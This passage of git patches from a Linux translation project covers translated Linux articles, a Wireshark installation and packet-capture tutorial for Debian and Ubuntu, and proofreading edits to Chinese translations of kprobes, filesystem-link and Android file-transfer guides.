This represents a two-point increase over last year among employers who said open source hiring would be their top field of recruitment. - -At the same time, 89 percent of hiring managers report it is difficult to find open source talent. - -### Why get certified - -The desire for sysadmins is incentivizing hiring managers to offer formal training and/or certifications in the discipline in 53 percent of organizations, compared to 47 percent last year, the Open Source Jobs Report finds. - -IT professionals interested in sysadmin positions should consider Linux certifications. Searches on several of the more well-known job posting sites reveal that the [CompTIA Linux+][4]certification is the top certification for entry-level Linux sysadmin, while [Red Hat Certified Engineer (RHCE)][5] and [Red Hat Certified System Administrator (RHCSA)][6] are the main certifications for higher-level positions. - -In 2016, a sysadmin commanded a salary of $79,583, a change of -0.8 percent from the previous year, according to Dice’s [2017 Tech Salary Survey][7]. The systems architect position paid $125,946, a year-over-year change of -4.7 percent. Yet, the survey observes that “Highly skilled technology professionals remain in the most demand, especially those candidates proficient in the technologies needed to support industry transformation and growth.” - -When it comes to open source skills, HBase (an open-source distributed database), ranked as one that garners among the highest pay for tech pros in the Dice survey. In the networking and database category, the OpenVMS operating system ranked as another high-paying skill. - -### The sysadmin role - -One of a sysadmin’s responsibilities is to be available 24/7 when a problem occurs. The position calls for a mindset that is about “zero-blame, lean, iterative improvement in process or technology,’’ and one that is open to change, writes Paul English, a board member for the League of Professional System Administrators, a non-profit professional association for the advancement of the practice of system administration, in  [opensource.com][8]. He adds that being a sysadmin means “it’s almost a foregone conclusion that you’ll work with open source software like Linux, BSD, and even open source Solaris.” - -Today’s sysadmins will more often work with software rather than hardware, and should be prepared to write small scripts, according to English. - -### Outlook for 2018 - -Expect to see sysadmins among the tech professionals many employers in North America will be hiring in 2018, according to [Robert Half’s 2018 Salary Guide for Technology Professionals][9]. Increasingly, soft skills and leadership qualities are also highly valued. - -“Good listening and critical-thinking skills, which are essential to understanding and resolving customers’ issues and concerns, are important for almost any IT role today, but especially for help desk and desktop support professionals,’’ the report states. - -This jibes with some of the essential skills needed at various stages of the sysadmin position, including strong analytical skills and an ability to solve problems quickly, according to [The Linux Foundation][10]. - -Other skills sysadmins should have as they move up the ladder are: interest in structured approaches to system configuration management; experience in resolving security issues; experience with user identity management; ability to communicate in non-technical terms to non-technical people; and ability to modify system to meet new security requirements. - - _[Download ][11]the full 2017 Open Source Jobs Report now._ - --------------------------------------------------------------------------------- - -via: https://www.linux.com/blog/open-source-cloud-skills-and-certification-are-key-sysadmins - -作者:[ ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]: -[1]:https://www.linux.com/licenses/category/creative-commons-zero -[2]:https://www.linux.com/files/images/open-house-sysadminjpg -[3]:https://www.linuxfoundation.org/blog/2017-jobs-report-highlights-demand-open-source-skills/ -[4]:https://certification.comptia.org/certifications/linux?tracking=getCertified/certifications/linux.aspx -[5]:https://www.redhat.com/en/services/certification/rhce -[6]:https://www.redhat.com/en/services/certification/rhcsa -[7]:http://marketing.dice.com/pdf/Dice_TechSalarySurvey_2017.pdf?aliId=105832232 -[8]:https://opensource.com/article/17/7/truth-about-sysadmins -[9]:https://www.roberthalf.com/salary-guide/technology -[10]:https://www.linux.com/learn/10-essential-skills-novice-junior-and-senior-sysadmins%20%20 -[11]:http://bit.ly/2017OSSjobsreport From 1946828f0da9133814a5516dae4cae2c48115cad Mon Sep 17 00:00:00 2001 From: wxy Date: Fri, 1 Dec 2017 20:06:24 +0800 Subject: [PATCH 0114/1627] PUB:20161216 Kprobes Event Tracing on ARMv8.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @kimii 恭喜你完成了第一篇翻译! 发布地址: https://linux.cn/article-9098-1.html 你的 LCTT 专页是: https://linux.cn/lctt/kimii --- .../20161216 Kprobes Event Tracing on ARMv8.md | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) rename {translated/tech => published}/20161216 Kprobes Event Tracing on ARMv8.md (98%) diff --git a/translated/tech/20161216 Kprobes Event Tracing on ARMv8.md b/published/20161216 Kprobes Event Tracing on ARMv8.md similarity index 98% rename from translated/tech/20161216 Kprobes Event Tracing on ARMv8.md rename to published/20161216 Kprobes Event Tracing on ARMv8.md index 3c3ab0de5b..3985f064dc 100644 --- a/translated/tech/20161216 Kprobes Event Tracing on ARMv8.md +++ b/published/20161216 Kprobes Event Tracing on ARMv8.md @@ -29,19 +29,19 @@ jprobes 允许通过提供一个具有相同调用签名call signature kprobes 提供一系列能从内核代码中调用的 API 来设置探测点和当探测点被命中时调用的注册函数。在不往内核中添加代码的情况下,kprobes 也是可用的,这是通过写入特定事件追踪的 debugfs 文件来实现的,需要在文件中设置探针地址和信息,以便在探针被命中时记录到追踪日志中。后者是本文将要讨论的重点。最后 kprobes 可以通过 perl 命令来使用。 -### kprobes API +#### kprobes API 内核开发人员可以在内核中编写函数(通常在专用的调试模块中完成)来设置探测点,并且在探测指令执行前和执行后立即执行任何所需操作。这在 kprobes.txt 中有很好的解释。 -### 事件追踪 +#### 事件追踪 事件追踪子系统有自己的自己的文档^注2 ,对于了解一般追踪事件的背景可能值得一读。事件追踪子系统是追踪点tracepoints和 kprobes 事件追踪的基础。事件追踪文档重点关注追踪点,所以请在查阅文档时记住这一点。kprobes 与追踪点不同的是没有预定义的追踪点列表,而是采用动态创建的用于触发追踪事件信息收集的任意探测点。事件追踪子系统通过一系列 debugfs 文件来控制和监视。事件追踪(`CONFIG_EVENT_TRACING`)将在被如 kprobe 事件追踪子系统等需要时自动选择。 -#### kprobes 事件 +##### kprobes 事件 使用 kprobes 事件追踪子系统,用户可以在内核任意断点处指定要报告的信息,只需要指定任意现有可探测指令的地址以及格式化信息即可确定。在执行过程中遇到断点时,kprobes 将所请求的信息传递给事件追踪子系统的公共部分,这些部分将数据格式化并追加到追踪日志中,就像追踪点的工作方式一样。kprobes 使用一个类似的但是大部分是独立的 debugfs 文件来控制和显示追踪事件信息。该功能可使用 `CONFIG_KPROBE_EVENT` 来选择。Kprobetrace 文档^ 注3 提供了如何使用 kprobes 事件追踪的基本信息,并且应当被参考用以了解以下介绍示例的详细信息。 -### kprobes 和 perf +#### kprobes 和 perf perf 工具为 kprobes 提供了另一个命令行接口。特别地,`perf probe` 允许探测点除了由函数名加偏移量和地址指定外,还可由源文件和行号指定。perf 接口实际上是使用 kprobes 的 debugfs 接口的封装器。 @@ -60,7 +60,7 @@ perf 工具为 kprobes 提供了另一个命令行接口。特别地,`perf pro kprobes 的一个常用例子是检测函数入口和/或出口。因为只需要使用函数名来作为探针地址,它安装探针特别简单。kprobes 事件追踪将查看符号名称并且确定地址。ARMv8 调用标准定义了函数参数和返回值的位置,并且这些可以作为 kprobes 事件处理的一部分被打印出来。 -### 例子: 函数入口探测 +#### 例子: 函数入口探测 检测 USB 以太网驱动程序复位功能: @@ -94,7 +94,7 @@ kworker/0:0-4 [000] d… 10972.102939: p_ax88772_reset_0: 这里我们可以看见传入到我们的探测函数的指针参数的值。由于我们没有使用 kprobes 事件追踪的可选标签功能,我们需要的信息自动被标注为 `arg1`。注意这指向我们需要 kprobes 记录这个探针的一组值的第一个,而不是函数参数的实际位置。在这个例子中它也只是碰巧是我们探测函数的第一个参数。 -### 例子: 函数入口和返回探测 +#### 例子: 函数入口和返回探测 kretprobe 功能专门用于探测函数返回。在函数入口 kprobes 子系统将会被调用并且建立钩子以便在函数返回时调用,钩子将记录需求事件信息。对最常见情况,返回信息通常在 `X0` 寄存器中,这是非常有用的。在 `%x0` 中返回值也可以被称为 `$retval`。以下例子也演示了如何提供一个可读的标签来展示有趣的信息。 @@ -132,7 +132,7 @@ _$ cat trace bash-1671 [001] d..1 214.401975: r__do_fork_0: (SyS_clone+0x18/0x20 <- _do_fork) pid=0x726_ ``` -### 例子: 解引用指针参数 +#### 例子: 解引用指针参数 对于指针值,kprobes 事件处理子系统也允许解引用和打印所需的内存内容,适用于各种基本数据类型。为了展示所需字段,手动计算结构的偏移量是必要的。 @@ -173,7 +173,7 @@ $ cat trace bash-1702 [002] d..1 175.347349: wait_r: (SyS_wait4+0x74/0xe4 <- do_wait) arg1=0xfffffffffffffff6 ``` -### 例子: 探测任意指令地址 +#### 例子: 探测任意指令地址 在前面的例子中,我们已经为函数的入口和出口插入探针,然而探测一个任意指令(除少数例外)是可能的。如果我们正在 C 函数中放置一个探针,第一步是查看代码的汇编版本以确定我们要放置探针的位置。一种方法是在 vmlinux 文件上使用 gdb,并在要放置探针的函数中展示指令。下面是一个在 `arch/arm64/kernel/modules.c` 中 `module_alloc` 函数执行此操作的示例。在这种情况下,因为 gdb 似乎更喜欢使用弱符号定义,并且它是与这个函数关联的存根代码,所以我们从 System.map 中来获取符号值: From b9958b0e9d18b14ddfa3ad5943434ab49d90560b Mon Sep 17 00:00:00 2001 From: wxy Date: Fri, 1 Dec 2017 20:16:01 +0800 Subject: [PATCH 0115/1627] PUB:20171009 Examining network connections on Linux systems.md @geekpi https://linux.cn/article-9099-1.html --- .../20171009 Examining network connections on Linux systems.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {translated/tech => published}/20171009 Examining network connections on Linux systems.md (100%) diff --git a/translated/tech/20171009 Examining network connections on Linux systems.md b/published/20171009 Examining network connections on Linux systems.md similarity index 100% rename from translated/tech/20171009 Examining network connections on Linux systems.md rename to published/20171009 Examining network connections on Linux systems.md From 0304f5e3b4ad9243a029253e3e0f5270654ce3ad Mon Sep 17 00:00:00 2001 From: darksun Date: Fri, 1 Dec 2017 22:25:26 +0800 Subject: [PATCH 0116/1627] translate by darksun --- ... A Tool To Use Google Translate From Command Line In Linux.md | 1 + 1 file changed, 1 insertion(+) diff --git a/sources/tech/20171130 Translate Shell – A Tool To Use Google Translate From Command Line In Linux.md b/sources/tech/20171130 Translate Shell – A Tool To Use Google Translate From Command Line In Linux.md index dbb687f262..3725fea5df 100644 --- a/sources/tech/20171130 Translate Shell – A Tool To Use Google Translate From Command Line In Linux.md +++ b/sources/tech/20171130 Translate Shell – A Tool To Use Google Translate From Command Line In Linux.md @@ -1,3 +1,4 @@ +translate by darksun Translate Shell – A Tool To Use Google Translate From Command Line In Linux ============================================================ From 7f62ebb0ce5a9cecd962c814ce3031170757d2ba Mon Sep 17 00:00:00 2001 From: darksun Date: Fri, 1 Dec 2017 22:39:39 +0800 Subject: [PATCH 0117/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20Inst?= =?UTF-8?q?all=20and=20Use=20Wireshark=20on=20Debian=20and=20Ubuntu=2016.0?= =?UTF-8?q?4=5F17.10?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...eshark on Debian and Ubuntu 16.04_17.10.md | 182 ++++++++++++++++++ 1 file changed, 182 insertions(+) create mode 100644 sources/tech/20171129 How to Install and Use Wireshark on Debian and Ubuntu 16.04_17.10.md diff --git a/sources/tech/20171129 How to Install and Use Wireshark on Debian and Ubuntu 16.04_17.10.md b/sources/tech/20171129 How to Install and Use Wireshark on Debian and Ubuntu 16.04_17.10.md new file mode 100644 index 0000000000..72fb4b5c99 --- /dev/null +++ b/sources/tech/20171129 How to Install and Use Wireshark on Debian and Ubuntu 16.04_17.10.md @@ -0,0 +1,182 @@ +How to Install and Use Wireshark on Debian 9 / Ubuntu 16.04 / 17.10 +============================================================ + +by [Pradeep Kumar][1] · Published November 29, 2017 · Updated November 29, 2017 + + [![wireshark-Debian-9-Ubuntu 16.04 -17.10](https://www.linuxtechi.com/wp-content/uploads/2017/11/wireshark-Debian-9-Ubuntu-16.04-17.10.jpg)][2] + +Wireshark is free and open source, cross platform, GUI based Network packet analyzer that is available for Linux, Windows, MacOS, Solaris etc. It captures network packets in real time & presents them in human readable format. Wireshark allows us to monitor the network packets up to microscopic level. Wireshark also has a command line utility called ‘tshark‘ that performs the same functions as Wireshark but through terminal & not through GUI. + +Wireshark can be used for network troubleshooting, analyzing, software & communication protocol development & also for education purposed. Wireshark uses a library called ‘pcap‘ for capturing the network packets. + +Wireshark comes with a lot of features & some those features are; + +* Support for a hundreds of protocols for inspection, + +* Ability to capture packets in real time & save them for later offline analysis, + +* A number of filters to analyzing data, + +* Data captured can be compressed & uncompressed on the fly, + +* Various file formats for data analysis supported, output can also be saved to XML, CSV, plain text formats, + +* data can be captured from a number of interfaces like ethernet, wifi, bluetooth, USB, Frame relay , token rings etc. + +In this article, we will discuss how to install Wireshark on Ubuntu/Debain machines & will also learn to use Wireshark for capturing network packets. + +#### Installation of Wireshark on Ubuntu 16.04 / 17.10 + +Wireshark is available with default Ubuntu repositories & can be simply installed using the following command. But there might be chances that you will not get the latest version of wireshark. + +``` +linuxtechi@nixworld:~$ sudo apt-get update +linuxtechi@nixworld:~$ sudo apt-get install wireshark -y +``` + +So to install latest version of wireshark we have to enable or configure official wireshark repository. + +Use the beneath commands one after the another to configure repository and to install latest version of Wireshark utility + +``` +linuxtechi@nixworld:~$ sudo add-apt-repository ppa:wireshark-dev/stable +linuxtechi@nixworld:~$ sudo apt-get update +linuxtechi@nixworld:~$ sudo apt-get install wireshark -y +``` + +Once the Wireshark is installed execute the below command so that non-root users can capture live packets of interfaces, + +``` +linuxtechi@nixworld:~$ sudo setcap 'CAP_NET_RAW+eip CAP_NET_ADMIN+eip' /usr/bin/dumpcap +``` + +#### Installation of Wireshark on Debian 9 + +Wireshark package and its dependencies are already present in the default debian 9 repositories, so to install latest and stable version of Wireshark on Debian 9, use the following command: + +``` +linuxtechi@nixhome:~$ sudo apt-get update +linuxtechi@nixhome:~$ sudo apt-get install wireshark -y +``` + +During the installation, it will prompt us to configure dumpcap for non-superusers, + +Select ‘yes’ and then hit enter. + + [![Configure-Wireshark-Debian9](https://www.linuxtechi.com/wp-content/uploads/2017/11/Configure-Wireshark-Debian9-1024x542.jpg)][3] + +Once the Installation is completed, execute the below command so that non-root users can also capture the live packets of the interfaces. + +``` +linuxtechi@nixhome:~$ sudo chmod +x /usr/bin/dumpcap +``` + +We can also use the latest source package to install the wireshark on Ubuntu/Debain & many other Linux distributions. + +#### Installing Wireshark using source code on Debian / Ubuntu Systems + +Firstly download the latest source package (which is 2.4.2 at the time for writing this article), use the following command, + +``` +linuxtechi@nixhome:~$ wget https://1.as.dl.wireshark.org/src/wireshark-2.4.2.tar.xz +``` + +Next extract the package & enter into the extracted directory, + +``` +linuxtechi@nixhome:~$ tar -xf wireshark-2.4.2.tar.xz -C /tmp +linuxtechi@nixhome:~$ cd /tmp/wireshark-2.4.2 +``` + +Now we will compile the code with the following commands, + +``` +linuxtechi@nixhome:/tmp/wireshark-2.4.2$ ./configure --enable-setcap-install +linuxtechi@nixhome:/tmp/wireshark-2.4.2$ make +``` + +Lastly install the compiled packages to install Wireshark on the system, + +``` +linuxtechi@nixhome:/tmp/wireshark-2.4.2$ sudo make install +linuxtechi@nixhome:/tmp/wireshark-2.4.2$ sudo ldconfig +``` + +Upon installation a separate group for Wireshark will also be created, we will now add our user to the group so that it can work with wireshark otherwise you might get ‘permission denied‘ error when starting wireshark. + +To add the user to the wireshark group, execute the following command, + +``` +linuxtechi@nixhome:~$ sudo usermod -a -G wireshark linuxtechi +``` + +Now we can start wireshark either from GUI Menu or from terminal with this command, + +``` +linuxtechi@nixhome:~$ wireshark +``` + +#### Access Wireshark on Debian 9 System + + [![Access-wireshark-debian9](https://www.linuxtechi.com/wp-content/uploads/2017/11/Access-wireshark-debian9-1024x664.jpg)][4] + +Click on Wireshark icon + + [![Wireshark-window-debian9](https://www.linuxtechi.com/wp-content/uploads/2017/11/Wireshark-window-debian9-1024x664.jpg)][5] + +#### Access Wireshark on Ubuntu 16.04 / 17.10 + + [![Access-wireshark-Ubuntu](https://www.linuxtechi.com/wp-content/uploads/2017/11/Access-wireshark-Ubuntu-1024x664.jpg)][6] + +Click on Wireshark icon + + [![Wireshark-window-Ubuntu](https://www.linuxtechi.com/wp-content/uploads/2017/11/Wireshark-window-Ubuntu-1024x664.jpg)][7] + +#### Capturing and Analyzing packets + +Once the wireshark has been started, we should be presented with the wireshark window, example is shown above for Ubuntu and Debian system. + + [![wireshark-Linux-system](https://www.linuxtechi.com/wp-content/uploads/2017/11/wireshark-Linux-system.jpg)][8] + +All these are the interfaces from where we can capture the network packets. Based on the interfaces you have on your system, this screen might be different for you. + +We are selecting ‘enp0s3’ for capturing the network traffic for that inteface. After selecting the inteface, network packets for all the devices on our network start to populate (refer to screenshot below) + + [![Capturing-Packet-from-enp0s3-Ubuntu-Wireshark](https://www.linuxtechi.com/wp-content/uploads/2017/11/Capturing-Packet-from-enp0s3-Ubuntu-Wireshark-1024x727.jpg)][9] + +First time we see this screen we might get overwhelmed by the data that is presented in this screen & might have thought how to sort out this data but worry not, one the best features of Wireshark is its filters. + +We can sort/filter out the data based on IP address, Port number, can also used source & destination filters, packet size etc & can also combine 2 or more filters together to create more comprehensive searches. We can either write our filters in ‘Apply a Display Filter‘ tab , or we can also select one of already created rules. To select pre-built filter, click on ‘flag‘ icon , next to ‘Apply a Display Filter‘ tab, + + [![Filter-in-wireshark-Ubuntu](https://www.linuxtechi.com/wp-content/uploads/2017/11/Filter-in-wireshark-Ubuntu-1024x727.jpg)][10] + +We can also filter data based on the color coding, By default, light purple is TCP traffic, light blue is UDP traffic, and black identifies packets with errors , to see what these codes mean, click View -> Coloring Rules, also we can change these codes. + + [![Packet-Colouring-Wireshark](https://www.linuxtechi.com/wp-content/uploads/2017/11/Packet-Colouring-Wireshark-1024x682.jpg)][11] + +After we have the results that we need, we can then click on any of the captured packets to get more details about that packet, this will show all the data about that network packet. + +Wireshark is an extremely powerful tool takes some time to getting used to & make a command over it, this tutorial will help you get started. Please feel free to drop in your queries or suggestions in the comment box below. + +-------------------------------------------------------------------------------- + +via: https://www.linuxtechi.com + +作者:[Pradeep Kumar][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linuxtechi.comhttps://www.linuxtechi.com/author/pradeep/ +[1]:https://www.linuxtechi.com/author/pradeep/ +[2]:https://www.linuxtechi.com/wp-content/uploads/2017/11/wireshark-Debian-9-Ubuntu-16.04-17.10.jpg +[3]:https://www.linuxtechi.com/wp-content/uploads/2017/11/Configure-Wireshark-Debian9.jpg +[4]:https://www.linuxtechi.com/wp-content/uploads/2017/11/Access-wireshark-debian9.jpg +[5]:https://www.linuxtechi.com/wp-content/uploads/2017/11/Wireshark-window-debian9.jpg +[6]:https://www.linuxtechi.com/wp-content/uploads/2017/11/Access-wireshark-Ubuntu.jpg +[7]:https://www.linuxtechi.com/wp-content/uploads/2017/11/Wireshark-window-Ubuntu.jpg +[8]:https://www.linuxtechi.com/wp-content/uploads/2017/11/wireshark-Linux-system.jpg +[9]:https://www.linuxtechi.com/wp-content/uploads/2017/11/Capturing-Packet-from-enp0s3-Ubuntu-Wireshark.jpg +[10]:https://www.linuxtechi.com/wp-content/uploads/2017/11/Filter-in-wireshark-Ubuntu.jpg +[11]:https://www.linuxtechi.com/wp-content/uploads/2017/11/Packet-Colouring-Wireshark.jpg From 76192d694f4554ba30a761dab869089d42955561 Mon Sep 17 00:00:00 2001 From: darksun Date: Fri, 1 Dec 2017 22:40:32 +0800 Subject: [PATCH 0118/1627] update --- ...nstall and Use Wireshark on Debian and Ubuntu 16.04_17.10.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/sources/tech/20171129 How to Install and Use Wireshark on Debian and Ubuntu 16.04_17.10.md b/sources/tech/20171129 How to Install and Use Wireshark on Debian and Ubuntu 16.04_17.10.md index 72fb4b5c99..ce2ed658a4 100644 --- a/sources/tech/20171129 How to Install and Use Wireshark on Debian and Ubuntu 16.04_17.10.md +++ b/sources/tech/20171129 How to Install and Use Wireshark on Debian and Ubuntu 16.04_17.10.md @@ -168,7 +168,7 @@ via: https://www.linuxtechi.com 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 -[a]:https://www.linuxtechi.comhttps://www.linuxtechi.com/author/pradeep/ +[a]:https://www.linuxtechi.com/author/pradeep/ [1]:https://www.linuxtechi.com/author/pradeep/ [2]:https://www.linuxtechi.com/wp-content/uploads/2017/11/wireshark-Debian-9-Ubuntu-16.04-17.10.jpg [3]:https://www.linuxtechi.com/wp-content/uploads/2017/11/Configure-Wireshark-Debian9.jpg From 5c6fafdb4f57ad75f35cc283eef98c5edcfa4012 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=BC=A0=E5=AE=88=E6=B0=B8?= Date: Sat, 2 Dec 2017 00:50:35 +0800 Subject: [PATCH 0119/1627] Update 20170622 A users guide to links in the Linux filesystem.md --- ... guide to links in the Linux filesystem.md | 19 +++++++++---------- 1 file changed, 9 insertions(+), 10 deletions(-) diff --git a/sources/tech/20170622 A users guide to links in the Linux filesystem.md b/sources/tech/20170622 A users guide to links in the Linux filesystem.md index 3cb59aaacb..5dc6f72e35 100644 --- a/sources/tech/20170622 A users guide to links in the Linux filesystem.md +++ b/sources/tech/20170622 A users guide to links in the Linux filesystem.md @@ -1,28 +1,27 @@ Translating by yongshouzhang - -A user's guide to links in the Linux filesystem +linux 文件链接用户指南 ============================================================ -### Learn how to use links, which make tasks easier by providing access to files from multiple locations in the Linux filesystem directory tree. +### 学习如何使用链接,通过提供对 linux 文件系统多个位置的文件访问,来让日常工作变得轻松 ![A user's guide to links in the Linux filesystem](https://opensource.com/sites/default/files/styles/image-full-size/public/images/life/links.png?itok=AumNmse7 "A user's guide to links in the Linux filesystem") Image by : [Paul Lewin][8]. Modified by Opensource.com. [CC BY-SA 2.0][9] -In articles I have written about various aspects of Linux filesystems for Opensource.com, including [An introduction to Linux's EXT4 filesystem][10]; [Managing devices in Linux][11]; [An introduction to Linux filesystems][12]; and [A Linux user's guide to Logical Volume Management][13], I have briefly mentioned an interesting feature of Linux filesystems that can make some tasks easier by providing access to files from multiple locations in the filesystem directory tree. +在我为 opensource.com 写过的关于linux文件系统方方面面的文章中,包括 [An introduction to Linux's EXT4 filesystem][10]; [Managing devices in Linux][11]; [An introduction to Linux filesystems][12]; and [A Linux user's guide to Logical Volume Management][13],我曾简要的提到过linux文件系统一个有趣的特性,它允许用户访问linux文件目录树中多个位置的文件来简化一些任务 -There are two types of Linux filesystem links: hard and soft. The difference between the two types of links is significant, but both types are used to solve similar problems. They both provide multiple directory entries (or references) to a single file, but they do it quite differently. Links are powerful and add flexibility to Linux filesystems because [everything is a file][14]. +linux 文件系统中有两种链接:硬链接和软链接。虽然二者差别显著,但都用来解决相似的问题。它们都提供了对单个文件进行多个目录项的访问(引用),但实现却大为不同。链接的强大功能赋予了 linux 文件系统灵活性,因为[一切即文件][14]。 -More Linux resources +更多 linux 资源 -* [What is Linux?][1] +*   [什么是 linux ?][1] -* [What are Linux containers?][2] +*   [什么是 linux 容器?][2] -* [Download Now: Linux commands cheat sheet][3] +*   [现在下载: linux 命令速查表][3] -* [Advanced Linux commands cheat sheet][4] +*   [linux 高级命令速查表][4] * [Our latest Linux articles][5] From 9e36e008d5a2efad6905ef171fcbee939fcd354f Mon Sep 17 00:00:00 2001 From: wxy Date: Sat, 2 Dec 2017 09:37:48 +0800 Subject: [PATCH 0120/1627] PRF:20171124 How to Install Android File Transfer for Linux.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @wenwensnow 恭喜你,完成了第一篇翻译! --- ...Install Android File Transfer for Linux.md | 49 ++++++++----------- 1 file changed, 21 insertions(+), 28 deletions(-) diff --git a/translated/tech/20171124 How to Install Android File Transfer for Linux.md b/translated/tech/20171124 How to Install Android File Transfer for Linux.md index b93429f509..3cdb372c93 100644 --- a/translated/tech/20171124 How to Install Android File Transfer for Linux.md +++ b/translated/tech/20171124 How to Install Android File Transfer for Linux.md @@ -1,53 +1,46 @@ -Translating by wenwensnow +如何在 Linux 下安装安卓文件传输助手 +=============== -# 如何在Linux下安装安卓文件传输助手 +如果你尝试在 Ubuntu 下连接你的安卓手机,你也许可以试试 Linux 下的安卓文件传输助手。 -如果你尝试在Ubuntu下安装你的安卓手机,你也许可以试试Linux下的安卓文件传输助手 +本质上来说,这个应用是谷歌 macOS 版本的一个克隆。它是用 Qt 编写的,用户界面非常简洁,使得你能轻松在 Ubuntu 和安卓手机之间传输文件和文件夹。 -本质上来说,这个应用是谷歌mac版本的一个复制。它是用Qt编写的,用户界面非常简洁,使得你能轻松在Ubuntu和安卓手机之间传输文件。 +现在,有可能一部分人想知道有什么是这个应用可以做,而 Nautilus(Ubuntu 默认的文件资源管理器)不能做的,答案是没有。 -现在,有可能一部分人想知道有什么是这个应用可以做,而Nautilus(Ubuntu默认的文件资源管理器)不能做的,答案是没有。 +当我将我的 Nexus 5X(记得选择 [媒体传输协议 MTP][7] 选项)连接在 Ubuntu 上时,在 [GVfs][8](LCTT 译注: GNOME 桌面下的虚拟文件系统)的帮助下,我可以打开、浏览和管理我的手机,就像它是一个普通的 U 盘一样。 -当我将我的 Nexus 5X(记得选择[MTP][7] 选项)连接在Ubuntu上时,在[GVfs][8](Gnome桌面下的虚拟文件系统)的帮助下,我可以打开,浏览和管理我的手机, 就像它是一个普通的U盘一样。 +[![Nautilus MTP integration with a Nexus 5X](http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/browsing-android-mtp-nautilus.jpg)][9] - [![Nautilus MTP integration with a Nexus 5X](http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/browsing-android-mtp-nautilus.jpg)][9] +但是*一些*用户在使用默认的文件管理器时,在 MTP 的某些功能上会出现问题:比如文件夹没有正确加载,创建新文件夹后此文件夹不存在,或者无法在媒体播放器中使用自己的手机。 -但是一些用户在使用默认的文件管理器时,在MTP的某些功能上会出现问题:比如文件夹没有正确加载,创建新文件夹后此文件夹不存在,或者无法在媒体播放器中使用自己的手机。 - -这就是要为Linux系统用户设计一个安卓文件传输助手应用的原因。将这个应用当做将MTP设备安装在Linux下的另一种选择。如果你使用Linux下的默认应用时一切正常,你也许并不需要尝试使用它 (除非你真的很想尝试新鲜事物)。 +这就是要为 Linux 系统用户设计一个安卓文件传输助手应用的原因,将这个应用当做将 MTP 设备安装在 Linux 下的另一种选择。如果你使用 Linux 下的默认应用时一切正常,你也许并不需要尝试使用它 (除非你真的很想尝试新鲜事物)。 ![Android File Transfer Linux App](http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/android-file-transfer-for-linux-750x662.jpg) -app特点: +该 app 特点: *   简洁直观的用户界面 - -*   支持文件拖放功能(从Linux系统到手机) - -*   支持批量下载 (从手机到Linux系统) - +*   支持文件拖放功能(从 Linux 系统到手机) +*   支持批量下载 (从手机到 Linux系统) *   显示传输进程对话框 - -*   FUSE模块支持 - +*   FUSE 模块支持 *   没有文件大小限制 - *   可选命令行工具 -### Ubuntu下安装安卓手机文件助手的步骤 +### Ubuntu 下安装安卓手机文件助手的步骤 以上就是对这个应用的介绍,下面是如何安装它的具体步骤。 -这有一个[PPA](个人软件包集)源为Ubuntu 14.04 LTS(长期支持版本),16.04LTS 和 Ubuntu17.10 提供可用应用 +这有一个 [PPA](个人软件包集)源为 Ubuntu 14.04 LTS、16.04 LTS 和 Ubuntu 17.10 提供可用应用。 -为了将这一PPA加入你的软件资源列表中,执行这条命令: +为了将这一 PPA 加入你的软件资源列表中,执行这条命令: ``` sudo add-apt-repository ppa:samoilov-lex/aftl-stable ``` -接着,为了在Ubuntu下安装Linux版本的安卓文件传输助手,执行: +接着,为了在 Ubuntu 下安装 Linux版本的安卓文件传输助手,执行: ``` sudo apt-get update && sudo apt install android-file-transfer @@ -57,15 +50,15 @@ sudo apt-get update && sudo apt install android-file-transfer 你会在你的应用列表中发现这一应用的启动图标。 -在你启动这一应用之前,要确保没有其他应用(比如Nautilus)已经加载了你的手机.如果其他应用正在使用你的手机,就会显示“无法找到MTP设备”。为了解决这一问题,将你的手机从Nautilus(或者任何正在使用你的手机的应用)上移除,然后再重新启动安卓文件传输助手。 +在你启动这一应用之前,要确保没有其他应用(比如 Nautilus)已经挂载了你的手机。如果其它应用正在使用你的手机,就会显示“无法找到 MTP 设备”。要解决这一问题,将你的手机从 Nautilus(或者任何正在使用你的手机的应用)上移除,然后再重新启动安卓文件传输助手。 -------------------------------------------------------------------------------- via: http://www.omgubuntu.co.uk/2017/11/android-file-transfer-app-linux -作者:[ JOEY SNEDDON ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) +作者:[JOEY SNEDDON][a] +译者:[wenwensnow](https://github.com/wenwensnow) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 44890b335e26807c59e4b4201d4411e2f137f0a9 Mon Sep 17 00:00:00 2001 From: wxy Date: Sat, 2 Dec 2017 09:46:23 +0800 Subject: [PATCH 0121/1627] PRF:20171130 Search DuckDuckGo from the Command Line.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @yixunx 恭喜你完成了第一篇翻译,但是这个流程有点问题:你不应该翻译别人(@geekpi)申领的文章,而且是没有经过申领。 @Vic020 你合并这个 PR 的时候没有注意到这个情况 @geekpi 这是我们的新译者,可能对流程还不熟悉,请你体谅一下,可能造成了你的合并冲突和无用功。 --- ...Search DuckDuckGo from the Command Line.md | 26 +++++++------------ 1 file changed, 9 insertions(+), 17 deletions(-) diff --git a/translated/tech/20171130 Search DuckDuckGo from the Command Line.md b/translated/tech/20171130 Search 